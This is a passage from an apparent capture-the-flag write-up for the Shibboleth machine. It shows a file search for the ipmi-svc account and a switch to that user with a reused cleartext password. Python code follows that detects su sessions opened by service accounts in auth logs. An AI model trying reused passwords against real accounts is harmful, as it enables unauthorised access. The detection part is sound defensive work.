ipmi-svc


There is a user on Shibboleth, ipmi-svc.

zabbix@shibboleth:/etc/zabbix$ find / -user ipmi-svc -ls -type f 2>/dev/null
   397052      4 drwxr-xr-x   3 ipmi-svc ipmi-svc     4096 Oct 16  2021 /home/ipmi-svc
    23188      4 drwx------   2 ipmi-svc ipmi-svc     4096 Apr 27  2021 /home/ipmi-svc/.cache
   397329      4 -rw-rw-r--   1 ipmi-svc ipmi-svc       22 Apr 24  2021 /home/ipmi-svc/.vimrc
   397053      4 -rw-r--r--   1 ipmi-svc ipmi-svc      220 Apr 24  2021 /home/ipmi-svc/.bash_logout
   397054      4 -rw-r--r--   1 ipmi-svc ipmi-svc      807 Apr 24  2021 /home/ipmi-svc/.profile
   396864      0 lrwxrwxrwx   1 ipmi-svc ipmi-svc        9 Apr 27  2021 /home/ipmi-svc/.bash_history -> /dev/null
   397055      4 -rw-r--r--   1 ipmi-svc ipmi-svc     3771 Apr 24  2021 /home/ipmi-svc/.bashrc
   397276      4 -rw-r-----   1 ipmi-svc ipmi-svc       33 apr 17 18:26 /home/ipmi-svc/user.txt
   397057      0 lrwxrwxrwx   1 ipmi-svc ipmi-svc        9 Apr 28  2021 /home/ipmi-svc/.mysql_history -> /dev/null

It seems like there is no way to move laterally to the user, as there aren't any associated processes or files.

So I just decided to test for password reuse.

zabbix@shibboleth:/etc/zabbix$ su ipmi-svc
password: ilovepumkinpie1
 
ipmi-svc@shibboleth:/etc/zabbix$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)

And it worked. Password reuse confirmed. Lateral movement made to the ipmi-svc user.
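
From the defender's side, the su session above is unusual because a daemon account (zabbix) opens it. The following is an added detection example, not part of the original write-up: it scans auth.log-style text for su attempts whose caller is a service account. The log lines are constructed samples in the util-linux su syslog format, and the service account list, the admin user and uid=110 are assumptions.

```python
import re

# Assumption: daemon accounts that should never start an su session.
SERVICE_ACCOUNTS = {"zabbix", "www-data", "mysql"}

# util-linux su logs "(to TARGET) CALLER on TTY", with a "FAILED SU " prefix
# when authentication fails.
SU_LINE = re.compile(
    r"su(?:\[\d+\])?: (?P<failed>FAILED SU )?"
    r"\(to (?P<target>\S+)\) (?P<caller>\S+) on (?P<tty>\S+)"
)

# Constructed sample log lines (not taken from the target host).
SAMPLE_LOG = """\
Apr 17 18:40:02 shibboleth su: FAILED SU (to ipmi-svc) zabbix on pts/0
Apr 17 18:40:19 shibboleth su: (to ipmi-svc) zabbix on pts/0
Apr 17 18:40:19 shibboleth su: pam_unix(su:session): session opened for user ipmi-svc by (uid=110)
Apr 17 19:02:11 shibboleth su: (to root) admin on pts/1
"""


def find_service_account_su(log_text, service_accounts=SERVICE_ACCOUNTS):
    """Return one finding per su attempt made by a service account."""
    findings = []
    for line in log_text.splitlines():
        m = SU_LINE.search(line)
        if not m or m.group("caller") not in service_accounts:
            continue  # not an su attempt line, or caller is not a daemon account
        findings.append({
            "caller": m.group("caller"),
            "target": m.group("target"),
            "tty": m.group("tty"),
            "success": m.group("failed") is None,
        })
    return findings


if __name__ == "__main__":
    for f in find_service_account_su(SAMPLE_LOG):
        status = "SUCCESS" if f["success"] else "failed"
        print(f"{status}: {f['caller']} -> {f['target']} on {f['tty']}")
```

A successful hit means the target's password was known to whoever controls the service account, so the response is to rotate that password everywhere it is shared.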